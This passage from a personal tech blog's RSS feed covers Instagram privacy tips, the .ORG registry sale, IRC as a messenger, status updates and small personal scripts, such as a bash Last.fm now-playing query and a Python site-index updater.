757<li><p>Share your flight ticket in your story! I can’t stress this enough!!!
758Summer/winter break? “Look guys, I’m going home! Here’s where I live,
759and here’s my flight number—feel free to track me!”. This scenario is
760especially worrisome because the start and end points are known to the
761threat actor, and your arrival time can be trivially looked up—thanks
762to the flight number on your ticket. So, just don’t.</p></li>
763<li><p>Post screenshots with OS specific details. This might border on
764pendantic, but better safe than sorry. Your phone’s statusbar and navbar
765are better cropped out of pictures. They reveal the time, notifications
766(apps that you use), and can be used to identify your phone’s operating
767system. Besides, the status/nav bar isn’t very useful to your screenshot
768anyway.</p></li>
769<li><p>Share your voice. In general, reduce your footprint on the platform
770that can be used to identify you elsewhere.</p></li>
771<li><p>Think you’re safe if your account is set to private. It doesn’t take
772much to get someone who follows you, to show show your profile on their
773device.</p></li>
774</ul>
775
776<h3 id="dos">DOs</h3>
777
778<ul>
779<li><p>Post pictures that pertain to a specific location, once you’ve moved
780out of the location. Also applies to stories. It can wait.</p></li>
781<li><p>Post pictures that have been shot indoors. Or try to; reasons above.
782Who woulda thunk I’d advocate bathroom selfies?</p></li>
783<li><p>Delete old posts that are irrelevant to your current audience. Your
784friends at work don’t need to know about where you went to high school.</p></li>
785</ul>
786
787<p>More DON’Ts than DOs, that’s very telling. Here are a few more points
788that are good OPSEC practices in general:</p>
789
790<ul>
791<li><strong>Think before you share</strong>. Does it conform to the rules mentioned above?</li>
792<li><strong>Compartmentalize</strong>. Separate as much as you can from what you share
793online, from what you do IRL. Limit information exposure.</li>
794<li><strong>Assess your risks</strong>: Do this often. People change, your environments
795change, and consequentially the risks do too.</li>
796</ul>
797
798<h2 id="fin">Fin</h2>
799
800<p>Instagram is—much to my dismay—far too popular for it to die any
801time soon. There are plenty of good reasons to stop using the platform
802altogether (hint: Facebook), but that’s a discussion for another day.</p>
803
804<p>Or be like me:</p>
805
806<p><img src="/static/img/ig.jpg" alt="0 posts lul" /></p>
807
808<p>And that pretty much wraps it up, with a neat little bow.</p>
809
810<div class="footnotes">
811<hr />
812<ol>
813<li id="fn-ddepisode">
814<p><a href="https://darknetdiaries.com/episode/51/—Jack">https://darknetdiaries.com/episode/51/—Jack</a> talks about Indian hackers who operate on Instagram. <a href="#fnref-ddepisode" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
815</li>
816</ol>
817</div>
818]]></description><link>https://icyphox.sh/blog/ig-opsec</link><pubDate>Mon, 02 Dec 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/ig-opsec</guid></item><item><title>Save .ORG!</title><description><![CDATA[<p>The .ORG top-level domain introduced in 1985, has been operated by the
819<a href="https://en.wikipedia.org/wiki/Public_Interest_Registry">Public Interest Registry</a> since
8202003. The .ORG TLD is used primarily by communities, free and open source projects,
821and other non-profit organizations—although the use of the TLD isn’t
822restricted to non-profits.</p>
823
824<p>The Internet Society or ISOC, the group that created the PIR, has
825decided to sell the registry over to a private equity firm—Ethos
826Capital.</p>
827
828<h2 id="whats-the-problem">What’s the problem?</h2>
829
830<p>There are around 10 million .ORG TLDs registered, and a good portion of
831them are non-profits and non-governmental organizations. As the name
832suggests, they don’t earn any profits and all their operations rely on
833a thin inflow of donations. A private firm having control of the .ORG
834domain gives them the power to make decisions that would be unfavourable
835to the .ORG community:</p>
836
837<ul>
838<li><p>They control the registration/renewal fees of the TLD. They can
839hike the price if they wish to. As is stands, NGOs already earn very
840little—a .ORG price hike would put them in a very icky situation.</p></li>
841<li><p>They can introduce <a href="https://www.icann.org/resources/pages/rpm-drp-2017-10-04-en">Rights Protection
842Mechanisms</a>
843or RPMs, which are essentially legal statements that can—if not
844correctly developed—jeopardize / censor completely legal non-profit
845activities.</p></li>
846<li><p>Lastly, they can suspend domains at the whim of state actors. It isn’t
847news that nation states go after NGOs, targetting them with allegations
848of illegal activity. The registry being a private firm only simplifies
849the process.</p></li>
850</ul>
851
852<p>Sure, these are just “what ifs” and speculations, but the risk is real.
853Such power can be abused and this would be severly detrimental to NGOs
854globally.</p>
855
856<h2 id="how-can-i-help">How can I help?</h2>
857
858<p>We need to get the ISOC to <strong>stop the sale</strong>. Head over to
859<a href="https://savedotorg.org">https://savedotorg.org</a> and sign their letter. An email is sent on your
860behalf to:</p>
861
862<ul>
863<li>Andrew Sullivan, CEO, ISOC</li>
864<li>Jon Nevett, CEO, PIR</li>
865<li>Maarten Botterman, Board Chair, ICANN</li>
866<li>Göran Marby, CEO, ICANN</li>
867</ul>
868
869<h2 id="closing-thoughts">Closing thoughts</h2>
870
871<p>The Internet that we all love and care for is slowly being subsumed by
872megacorps and private firms, who’s only motive is to make a profit. The
873Internet was meant to be free, and we’d better act now if we want that
874freedom. The future looks bleak—I hope we aren’t too late.</p>
875]]></description><link>https://icyphox.sh/blog/save-org</link><pubDate>Sat, 23 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/save-org</guid></item><item><title>Status update</title><description><![CDATA[<p>This month is mostly just unfun stuff, lined up in a neat schedule –
876exams. I get all these cool ideas for things to do, and it’s always
877during exams. Anyway, here’s a quick update on what I’ve been up to.</p>
878
879<h2 id="blog-post-queue">Blog post queue</h2>
880
881<p>I realized that I could use this site’s
882<a href="https://github.com/icyphox/site">repo</a>’s issues to track blog post ideas.
883I’ve made a few, mostly just porting them over from my Google Keep note.</p>
884
885<p>This method of using issues is great, because readers can chime in with
886ideas for things I could possibly discuss—like in <a href="https://github.com/icyphox/site/issues/10">this
887issue</a>.</p>
888
889<h2 id="contemplating-a-vite-rewrite">Contemplating a <code>vite</code> rewrite</h2>
890
891<p><a href="https://github.com/icyphox/vite"><code>vite</code></a>, despite what the name suggests
892– is awfully slow. Also, Python is bloat.
893Will rewriting it fix that? That’s what I plan to find out. I have
894a couple of choices of languages to use in the rewrite:</p>
895
896<ul>
897<li>C: Fast, compiled. Except I suck at it. (<code>cite</code>?)</li>
898<li>Nim: My favourite, but I’ll have to write bindings to <a href="https://github.com/kristapsdz/lowdown"><code>lowdown(1)</code></a>. (<code>nite</code>?)</li>
899<li>Shell: Another favourite, muh “minimalsm”. No downside, really.
900(<code>shite</code>?)</li>
901</ul>
902
903<p>Oh, and did I mention—I want it to be compatible with <code>vite</code>.
904I don’t want to have to redo my site structure or its templates. At the
905moment, I rely on Jinja2 for templating, so I’ll need something similar.</p>
906
907<h2 id="irc-bot">IRC bot</h2>
908
909<p>My earlier post on <a href="/blog/irc-for-dms">IRC for DMs</a> got quite a bit of
910traction, which was pretty cool. I didn’t really talk much about the bot
911itself though; I’m dedicating this section to
912<a href="https://github.com/icyphox/detotated">detotated</a>.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
913
914<p>Fairly simple Python code, using plain sockets. So far, we’ve got a few
915basic features in place:</p>
916
917<ul>
918<li><code>.np</code> command: queries the user’s last.fm to get the currently playing
919track</li>
920<li>Fetches the URL title, when a URL is sent in chat</li>
921</ul>
922
923<p>That’s it, really. I plan to add a <code>.nps</code>, or “now playing Spotify”
924command, since we share Spotify links pretty often.</p>
925
926<h2 id="other">Other</h2>
927
928<p>I’ve been reading some more manga, I’ll update the <a href="/reading">reading
929log</a> when I, well… get around to it. Haven’t had time to do
930much in the past few weeks—the time at the end of a semester tends to
931get pretty tight. Here’s what I plan to get back to during this winter break:</p>
932
933<ul>
934<li>Russian!</li>
935<li>Window manager in Nim</li>
936<li><code>vite</code> rewrite, probably</li>
937<li>The other blog posts in queue</li>
938</ul>
939
940<p>I’ve also put off doing any “security work” for a while now, perhaps
941that’ll change this December. Or whenever.</p>
942
943<p>With that ends my status update, on all things that I <em>haven’t</em> done.</p>
944
945<div class="footnotes">
946<hr />
947<ol>
948<li id="fn-1">
949<p><a href="https://knowyourmeme.com/memes/dedotated-wam">https://knowyourmeme.com/memes/dedotated-wam</a> (dead meme, yes I know) <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
950</li>
951</ol>
952</div>
953]]></description><link>https://icyphox.sh/blog/2019-11-16</link><pubDate>Sat, 16 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-11-16</guid></item><item><title>IRC for DMs</title><description><![CDATA[<p><a href="https://nerdypepper.me">Nerdy</a> and I decided to try and use IRC for our
954daily communications, as opposed to non-free alternatives like WhatsApp
955or Telegram. This is an account of how that went.</p>
956
957<h2 id="the-status-quo-of-instant-messaging-apps">The status quo of instant messaging apps</h2>
958
959<p>I’ve tried a <em>ton</em> of messaging applications—Signal, WhatsApp,
960Telegram, Wire, Jami (Ring), Matrix, Slack, Discord and more recently, DeltaChat.</p>
961
962<p><strong>Signal</strong>: It straight up sucks on Android. Not to mention the
963centralized architecture, and OWS’s refusal to federate.</p>
964
965<p><strong>WhatsApp</strong>: Facebook’s spyware that people use without a second
966thought. The sole reason I have it installed is for University’s
967class groups; I can’t wait to graduate.</p>
968
969<p><strong>Telegram</strong>: Centralized architecture and a closed-source server. It’s
970got a very nice Android client, though.</p>
971
972<p><strong>Jami</strong>: Distributed platform, free software. I am not going to comment
973on this because I don’t recall what my experience was like, but I’m not
974using it now… so if that’s indicative of anything.</p>
975
976<p><strong>Matrix (Riot)</strong>: Distributed network. Multiple client implementations.
977Overall, pretty great, but it’s slow. I’ve had messages not send / not
978received a lot of times. Matrix + Riot excels in group communication, but
979really sucks for one-to-one chats.</p>
980
981<p><strong>Slack</strong> / <strong>Discord</strong>: <em>sigh</em></p>
982
983<p><strong>DeltaChat</strong>: Pretty interesting idea—on paper. Using existing email
984infrastructure for IM sounds great, but it isn’t all that cash in
985practice. Email isn’t instant, there’s always a delay of give or take
9865 to 10 seconds, if not more. This affects the flow of conversation.
987I might write a small blog post later, revewing DeltaChat.<sup class="footnote-ref" id="fnref-deltachat"><a href="#fn-deltachat">2</a></sup></p>
988
989<h2 id="why-irc">Why IRC?</h2>
990
991<p>It’s free, in all senses of the word. A lot of others have done a great
992job of answering this question in further detail, this is by far my
993favourite:</p>
994
995<p><a href="https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html">https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html</a></p>
996
997<h2 id="using-ircs-private-messages">Using IRC’s private messages</h2>
998
999<p>This was the next obvious choice, but personal message buffers don’t
1000persist in ZNC and it’s very annoying to have to do a <code>/query
1001nerdypepper</code> (Weechat) or to search and message a user via Revolution
1002IRC. The only unexplored option—using a channel.</p>
1003
1004<h2 id="setting-up-a-channel-for-dms">Setting up a channel for DMs</h2>
1005
1006<p>A fairly easy process:</p>
1007
1008<ul>
1009<li><p>Set modes (on Rizon)<sup class="footnote-ref" id="fnref-modes"><a href="#fn-modes">1</a></sup>:</p>
1010
1011<pre><code>#crimson [+ilnpstz 3]
1012</code></pre>
1013
1014<p>In essence, this limits the users to 3 (one bot), sets the channel to invite only,
1015hides the channel from <code>/whois</code> and <code>/list</code>, and a few other misc.
1016modes.</p></li>
1017<li><p>Notifications: Also a trivial task; a quick modification to <a href="https://weechat.org/scripts/source/lnotify.py.html/">lnotify.py</a>
1018to send a notification for all messages in the specified buffer
1019(<code>#crimson</code>) did the trick for Weechat. Revolution IRC, on the other
1020hand, has an option to setup rules for notifications—super
1021convenient.</p></li>
1022<li><p>A bot: Lastly, a bot for a few small tasks—fetching URL titles, responding
1023to <code>.np</code> (now playing) etc. Writing an IRC bot is dead simple, and it
1024took me about an hour or two to get most of the basic functionality in
1025place. The source is <a href="https://github.com/icyphox/detotated">here</a>.
1026It is by no means “good code”; it breaks spectacularly from time to
1027time.</p></li>
1028</ul>
1029
1030<h2 id="in-conclusion">In conclusion</h2>
1031
1032<p>As the subtitle suggests, using IRC has been great. It’s probably not
1033for everyone though, but it fits my (and Nerdy’s) usecase perfectly.</p>
1034
1035<p>P.S.: <em>I’m not sure why the footnotes are reversed.</em></p>
1036
1037<div class="footnotes">
1038<hr />
1039<ol>
1040<li id="fn-modes">
1041<p>Channel modes on <a href="https://wiki.rizon.net/index.php?title=Channel_Modes">Rizon</a>. <a href="#fnref-modes" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1042</li>
1043
1044<li id="fn-deltachat">
1045<p>It’s in <a href="https://github.com/icyphox/site/issues/10">queue</a>. <a href="#fnref-deltachat" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
1046</li>
1047</ol>
1048</div>
1049]]></description><link>https://icyphox.sh/blog/irc-for-dms</link><pubDate>Sun, 03 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/irc-for-dms</guid></item><item><title>The intelligence conundrum</title><description><![CDATA[<p>I watched the latest <a href="https://en.wikipedia.org/wiki/S.W.A.T._(2017_TV_series)">S.W.A.T.</a>
1050episode a couple of days ago, and it highlighted some interesting issues that
1051intelligence organizations face when working with law enforcement. Side note: it’s a pretty
1052good show if you like police procedurals.</p>
1053
1054<h2 id="the-problem">The problem</h2>
1055
1056<p>Consider the following scenario:</p>
1057
1058<ul>
1059<li>There’s a local drug lord who’s been recruited to provide intel, by a certain 3-letter organization.</li>
1060<li>Local PD busts his operation and proceed to arrest him.</li>
1061<li>3-letter org steps in, wants him released.</li>
1062</ul>
1063
1064<p>So here’s the thing, his presence is a threat to public but at the same time,
1065he can be a valuable long term asset—giving info on drug inflow, exchanges and perhaps even
1066actionable intel on bigger fish who exist on top of the ladder. But he also
1067seeks security. The 3-letter org must provide him with protection,
1068in case he’s blown. And like in our case, they’d have to step in if he gets arrested.</p>
1069
1070<p>Herein lies the problem. How far should an intelligence organization go to protect an asset?
1071Who matters more, the people they’ve sworn to protect, or the asset?
1072Because afterall, in the bigger picture, local PD and intel orgs are on the same side.</p>
1073
1074<p>Thus, the question arises—how can we measure the “usefulness” of an
1075asset to better quantify the tradeoff that is to be made?
1076Is the intel gained worth the loss of public safety?
1077This question remains largely unanswered, and is quite the
1078predicament should you find yourself in it.</p>
1079
1080<p>This was a fairly short post, but an interesting problem to ponder
1081nonetheless.</p>
1082]]></description><link>https://icyphox.sh/blog/intel-conundrum</link><pubDate>Mon, 28 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/intel-conundrum</guid></item><item><title>Hacky scripts</title><description><![CDATA[<p>As a CS student, I see a lot of people around me doing courses online
1083to learn to code. Don’t get me wrong—it probably works for some.
1084Everyone learns differently. But that’s only going to get you so far.
1085Great you know the syntax, you can solve some competitive programming
1086problems, but that’s not quite enough, is it? The actual learning comes
1087from <em>applying</em> it in solving <em>actual</em> problems—not made up ones.
1088(<em>inb4 some seething CP bro comes at me</em>)</p>
1089
1090<p>Now, what’s an actual problem? Some might define it as real world
1091problems that people out there face, and solving it probably requires
1092building a product. This is what you see in hackathons, generally.</p>
1093
1094<p>If you ask me, however, I like to define it as problems that <em>you</em> yourself
1095face. This could be anything. Heck, it might not even be a “problem”. It
1096could just be an itch that you want to scratch. And this is where
1097<strong>hacky scripts</strong> come in. Unclear? Let me illustrate with a few
1098examples.</p>
1099
1100<h2 id="now-playing-status-in-my-bar">Now playing status in my bar</h2>
1101
1102<p>If you weren’t aware already—I rice my desktop. A lot. And a part of
1103this cohesive experience I try to create involves a status bar up at the
1104top of my screen, showing the time, date, volume and battery statuses etc.</p>
1105
1106<p>So here’s the “problem”. I wanted to have my currently playing song
1107(Spotify), show up on my bar. How did I approach this? A few ideas
1108popped up in my head:</p>
1109
1110<ul>
1111<li>Send <code>playerctl</code>’s STDOUT into my bar</li>
1112<li>Write a Python script to query Spotify’s API</li>
1113<li>Write a Python/shell script to query Last.fm’s API</li>
1114</ul>
1115
1116<p>The first approach bombed instantly. <code>playerctl</code> didn’t recognize my
1117Spotify client and whined about some <code>dbus</code> issues to top it off.
1118I spent a while in that rabbit hole but eventually gave up.</p>
1119
1120<p>My next avenue was the Spotify Web API. One look at the <a href="https://developer.spotify.com/documentation/web-api/">docs</a> and
1121I realize that I’ll have to make <em>more</em> than one request to fetch the
1122artist and track details. Nope, I need this to work fast.</p>
1123
1124<p>Last resort—Last.fm’s API. Spolier alert, this worked. Also, arguably
1125the best choice, since it shows the track status regardless of where
1126the music is being played. Here’s the script in its entirety:</p>
1127
1128<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env bash</span>
1129<span class="c1"># now playing</span>
1130<span class="c1"># requires the last.fm API key</span>
1131
1132<span class="nb">source</span> ~/.lastfm <span class="c1"># `export API_KEY="<key>"`</span>
1133<span class="nv">fg</span><span class="o">=</span><span class="s2">"</span><span class="k">$(</span>xres color15<span class="k">)</span><span class="s2">"</span>
1134<span class="nv">light</span><span class="o">=</span><span class="s2">"</span><span class="k">$(</span>xres color8<span class="k">)</span><span class="s2">"</span>
1135
1136<span class="nv">USER</span><span class="o">=</span><span class="s2">"icyphox"</span>
1137<span class="nv">URL</span><span class="o">=</span><span class="s2">"http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks"</span>
1138<span class="nv">URL</span><span class="o">+=</span><span class="s2">"&user=</span><span class="nv">$USER</span><span class="s2">&api_key=</span><span class="nv">$API_KEY</span><span class="s2">&format=json&limit=1&nowplaying=true"</span>
1139<span class="nv">NOTPLAYING</span><span class="o">=</span><span class="s2">" "</span> <span class="c1"># I like to have it show nothing</span>
1140<span class="nv">RES</span><span class="o">=</span><span class="k">$(</span>curl -s <span class="nv">$URL</span><span class="k">)</span>
1141<span class="nv">NOWPLAYING</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">'.recenttracks.track[0]."@attr".nowplaying'</span> <span class="o"><<<</span> <span class="s2">"</span><span class="nv">$RES</span><span class="s2">"</span> <span class="p">|</span> tr -d <span class="s1">'"'</span><span class="k">)</span>
1142
1143
1144<span class="k">if</span> <span class="o">[[</span> <span class="s2">"</span><span class="nv">$NOWPLAYING</span><span class="s2">"</span> <span class="o">=</span> <span class="s2">"true"</span> <span class="o">]]</span>
1145<span class="k">then</span>
1146 <span class="nv">TRACK</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">'.recenttracks.track[0].name'</span> <span class="o"><<<</span> <span class="s2">"</span><span class="nv">$RES</span><span class="s2">"</span> <span class="p">|</span> tr -d <span class="s1">'"'</span><span class="k">)</span>
1147 <span class="nv">ARTIST</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">'.recenttracks.track[0].artist."#text"'</span> <span class="o"><<<</span> <span class="s2">"</span><span class="nv">$RES</span><span class="s2">"</span> <span class="p">|</span> tr -d <span class="s1">'"'</span><span class="k">)</span>
1148 <span class="nb">echo</span> -ne <span class="s2">"%{F</span><span class="nv">$light</span><span class="s2">}</span><span class="nv">$TRACK</span><span class="s2"> %{F</span><span class="nv">$fg</span><span class="s2">}by </span><span class="nv">$ARTIST</span><span class="s2">"</span>
1149<span class="k">else</span>
1150 <span class="nb">echo</span> -ne <span class="s2">"</span><span class="nv">$NOTPLAYING</span><span class="s2">"</span>
1151<span class="k">fi</span>
1152</code></pre></div>
1153
1154<p>The <code>source</code> command is used to fetch the API key which I store at
1155<code>~/.lastfm</code>. The <code>fg</code> and <code>light</code> variables can be ignored, they’re only
1156for coloring output on my bar. The rest is fairly trivial and just
1157involves JSON parsing with <a href="https://stedolan.github.io/jq/"><code>jq</code></a>.
1158That’s it! It’s so small, but I learnt a ton. For those curious, here’s
1159what it looks like running:</p>
1160
1161<p><img src="/static/img/now_playing.png" alt="now playing status polybar" /></p>
1162
1163<h2 id="update-latest-post-on-the-index-page">Update latest post on the index page</h2>
1164
1165<p>This pertains to this very blog that you’re reading. I wanted a quick
1166way to update the “latest post” section in the home page and the
1167<a href="/blog">blog</a> listing, with a link to the latest post. This would require
1168editing the Markdown <a href="https://github.com/icyphox/site/tree/master/pages">source</a>
1169of both pages.</p>
1170
1171<p>This was a very
1172interesting challenge to me, primarily because it requires in-place
1173editing of the file, not just appending. Sure, I could’ve come up with
1174some <code>sed</code> one-liner, but that didn’t seem very fun. Also I hate
1175regexes. Did a lot of research (read: Googling) on in-place editing of
1176files in Python, sorting lists of files by modification time etc. and
1177this is what I ended up on, ultimately:</p>
1178
1179<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
1180
1181<span class="kn">from</span> <span class="nn">markdown2</span> <span class="kn">import</span> <span class="n">markdown_path</span>
1182<span class="kn">import</span> <span class="nn">os</span>
1183<span class="kn">import</span> <span class="nn">fileinput</span>
1184<span class="kn">import</span> <span class="nn">sys</span>
1185
1186<span class="c1"># change our cwd</span>
1187<span class="n">os</span><span class="o">.</span><span class="n">chdir</span><span class="p">(</span><span class="s2">"bin"</span><span class="p">)</span>
1188
1189<span class="n">blog</span> <span class="o">=</span> <span class="s2">"../pages/blog/"</span>
1190
1191<span class="c1"># get the most recently created file</span>
1192<span class="k">def</span> <span class="nf">getrecent</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
1193 <span class="n">files</span> <span class="o">=</span> <span class="p">[</span><span class="n">path</span> <span class="o">+</span> <span class="n">f</span> <span class="k">for</span> <span class="n">f</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">blog</span><span class="p">)</span> <span class="k">if</span> <span class="n">f</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">[</span><span class="s2">"_index.md"</span><span class="p">,</span> <span class="s2">"feed.xml"</span><span class="p">]]</span>
1194 <span class="n">files</span><span class="o">.</span><span class="n">sort</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">getmtime</span><span class="p">,</span> <span class="n">reverse</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
1195 <span class="k">return</span> <span class="n">files</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
1196
1197<span class="c1"># adding an entry to the markdown table</span>
1198<span class="k">def</span> <span class="nf">update_index</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
1199 <span class="n">path</span> <span class="o">=</span> <span class="s2">"../pages/_index.md"</span>
1200 <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
1201 <span class="n">md</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">readlines</span><span class="p">()</span>
1202 <span class="n">ruler</span> <span class="o">=</span> <span class="n">md</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s2">"| --- | --: |</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
1203 <span class="n">md</span><span class="p">[</span><span class="n">ruler</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">s</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span>
1204
1205 <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
1206 <span class="n">f</span><span class="o">.</span><span class="n">writelines</span><span class="p">(</span><span class="n">md</span><span class="p">)</span>
1207
1208<span class="c1"># editing the md source in-place</span>
1209<span class="k">def</span> <span class="nf">update_blog</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
1210 <span class="n">path</span> <span class="o">=</span> <span class="s2">"../pages/blog/_index.md"</span>
1211 <span class="n">s</span> <span class="o">=</span> <span class="n">s</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span>
1212 <span class="k">for</span> <span class="n">l</span> <span class="ow">in</span> <span class="n">fileinput</span><span class="o">.</span><span class="n">FileInput</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">inplace</span><span class="o">=</span><span class="mi">1</span><span class="p">):</span>
1213 <span class="k">if</span> <span class="s2">"--:"</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span>
1214 <span class="n">l</span> <span class="o">=</span> <span class="n">l</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l</span> <span class="o">+</span> <span class="n">s</span><span class="p">)</span>
1215 <span class="nb">print</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s2">""</span><span class="p">),</span>
1216
1217
1218<span class="c1"># fetch title and date</span>
1219<span class="n">meta</span> <span class="o">=</span> <span class="n">markdown_path</span><span class="p">(</span><span class="n">getrecent</span><span class="p">(</span><span class="n">blog</span><span class="p">),</span> <span class="n">extras</span><span class="o">=</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">])</span><span class="o">.</span><span class="n">metadata</span>
1220<span class="n">fname</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">basename</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">splitext</span><span class="p">(</span><span class="n">getrecent</span><span class="p">(</span><span class="n">blog</span><span class="p">))[</span><span class="mi">0</span><span class="p">])</span>
1221<span class="n">url</span> <span class="o">=</span> <span class="s2">"/blog/"</span> <span class="o">+</span> <span class="n">fname</span>
1222<span class="n">line</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">"| [</span><span class="si">{meta['title']}</span><span class="s2">](</span><span class="si">{url}</span><span class="s2">) | `</span><span class="si">{meta['date']}</span><span class="s2">` |"</span>
1223
1224<span class="n">update_index</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
1225<span class="n">update_blog</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
1226</code></pre></div>
1227
1228<p>I’m going to skip explaining this one out, but in essence, it’s <strong>one
1229massive hack</strong>. And in the end, that’s my point exactly. It’s very
1230hacky, but the sheer amount I learnt by writing this ~50
1231line script can’t be taught anywhere.</p>
1232
1233<p>This was partially how
1234<a href="https://github.com/icyphox/vite">vite</a> was born. It was originally
1235intended to be a script to build my site, but grew into a full-blown
1236Python package. I could’ve just
1237used an off-the-shelf static site generator
1238given that there are <a href="https://staticgen.com">so many</a> of them, but
1239I chose to write one myself.</p>
1240
1241<p>And that just about sums up what I wanted to say. The best and most fun
1242way to learn to code—write hacky scripts. You heard it here.</p>
1243]]></description><link>https://icyphox.sh/blog/hacky-scripts</link><pubDate>Thu, 24 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/hacky-scripts</guid></item><item><title>Status update</title><description><![CDATA[<p>I’ve decided to drop the “Weekly” part of the status update posts, since
1244they were never weekly and—let’s be honest—they aren’t going to be.
1245These posts are, henceforth, just “Status updates”. The date range can
1246be inferred from the post date.</p>
1247
1248<p>That said, here’s what I’ve been up to!</p>
1249
1250<h2 id="void-linux">Void Linux</h2>
1251
1252<p>Yes, I decided to ditch Alpine in favor of Void. Alpine was great,
1253really. The very comfy <code>apk</code>, ultra mnml system… but having to
1254maintain a chroot for my glibc needs was getting way too painful. And
1255the package updates are so slow! Heck, they’re still on kernel 4.xx on
1256their supposed “bleeding” <code>edge</code> repo.</p>
1257
1258<p>So yes, Void Linux it is. Still a very clean system. I’m loving it.
1259I also undervolted my system using <a href="https://github.com/georgewhewell/undervolt"><code>undervolt</code></a>
1260(-95 mV). Can’t say for sure if there’s a noticeable difference in
1261battery life though. I’ll see if I can run some tests.</p>
1262
1263<p>This <em>should</em> be the end of my distro hopping. Hopefully.</p>
1264
1265<h2 id="pycon">PyCon</h2>
1266
1267<p>Yeah yeah, enough already. Read <a href="/blog/pycon-wrap-up">my previous post</a>.</p>
1268
1269<h2 id="this-website">This website</h2>
1270
1271<p>I’ve moved out of GitHub Pages over to Netlify. This isn’t my first time
1272using Netlify, though. I used to host my old blog which ran Hugo, there.
1273I was tired of doing this terrible hack to maintain a single repo for
1274both my source (<code>master</code>) and deploy (<code>gh-pages</code>). In essence, here’s
1275what I did:</p>
1276
1277<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env bash</span>
1278
1279git push origin master
1280<span class="c1"># push contents of `build/` to the `gh-pages` branch</span>
1281git subtree push --prefix build origin gh-pages
1282</code></pre></div>
1283
1284<p>I can now simply push to <code>master</code>, and Netlify generates a build for me
1285by installing <a href="https://github.com/icyphox/vite">vite</a>, and running <code>vite
1286build</code>. Very pleasant.</p>
1287
1288<h2 id="mnmlwms-status"><code>mnmlwm</code>’s status</h2>
1289
1290<p><a href="https://github.com/minimalwm/minimal">mnmlwm</a>, for those unaware, is my pet project which aims to be a simple
1291window manager written in Nim. I’d taken a break from it for a while
1292because Xlib is such a pain to work with (or I’m just dense). Anyway,
1293I’m planning on getting back to it, with some fresh inspiration from
1294Dylan Araps’ <a href="https://github.com/dylanaraps/sowm">sowm</a>.</p>
1295
1296<h2 id="other">Other</h2>
1297
1298<p>I’ve been reading a lot of manga lately. Finished <em>Kekkon Yubiwa
1299Monogatari</em> (till the latest chapter) and <em>Another</em>, and I’ve just
1300started <em>Kakegurui</em>. I’ll reserve my opinions for when I update the
1301<a href="/reading">reading log</a>.</p>
1302
1303<p>That’s about it, and I’ll see you—definitely not next week.</p>
1304]]></description><link>https://icyphox.sh/blog/2019-10-17</link><pubDate>Wed, 16 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-10-17</guid></item><item><title>PyCon India 2019 wrap-up</title><description><![CDATA[<p>I’m writing this article as I sit in class, back on the grind. Last
1305weekend—Oct 12th and 13th—was PyCon India 2019, in Chennai, India.
1306It was my first PyCon, <em>and</em> my first ever talk at a major conference!
1307This is an account of the all the cool stuff I saw, people I met and the
1308talks I enjoyed.
1309Forgive the lack of pictures—I prefer living the moment through my
1310eyes. </p>
1311
1312<h2 id="talks">Talks</h2>
1313
1314<p>So much ML! Not that it’s a bad thing, but definitely interesting to
